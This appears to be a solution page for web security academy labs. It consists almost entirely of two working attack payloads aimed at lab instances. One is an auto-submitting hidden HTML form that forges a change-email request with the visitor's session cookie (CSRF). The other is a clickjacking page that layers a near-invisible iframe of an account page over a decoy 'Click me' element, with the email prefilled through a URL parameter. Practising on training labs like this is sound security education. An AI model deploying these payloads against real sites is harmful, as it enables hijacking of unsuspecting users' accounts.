Cross-site request forgery (CSRF)
Lab: CSRF vulnerability with no defenses
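<!-- CSRF proof of concept: hidden form aimed at the lab's change-email endpoint, which the lab title describes as having no defenses -->
<form method="POST" action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email">
    <input type="hidden" name="email" value="anything@web-security-academy.net">
</form>
<script>
    // Auto-submit on page load; the browser sends the request with the visitor's session cookie.
    document.forms[0].submit();
</script>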
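<!-- Separate snippet: clickjacking overlay (near-transparent iframe stacked above a decoy element) -->
<style>
    /* The framed target page sits on top (z-index 2) and is almost invisible. */
    iframe {
        position: relative;
        width: 700px;
        height: 500px;
        opacity: 0.1;
        z-index: 2;
    }
    /* The decoy text sits underneath (z-index 1), positioned by its top/left offsets. */
    div {
        position: absolute;
        top: 450px;
        left: 60px;
        z-index: 1;
    }
</style>
<div>Click me</div>
<!-- The email field of the framed page is prefilled through the "email" URL parameter. -->
<iframe src="https://0a0700e40484434d81eb262a00f20067.web-security-academy.net/my-account?email=test123@test-website.com"></iframe>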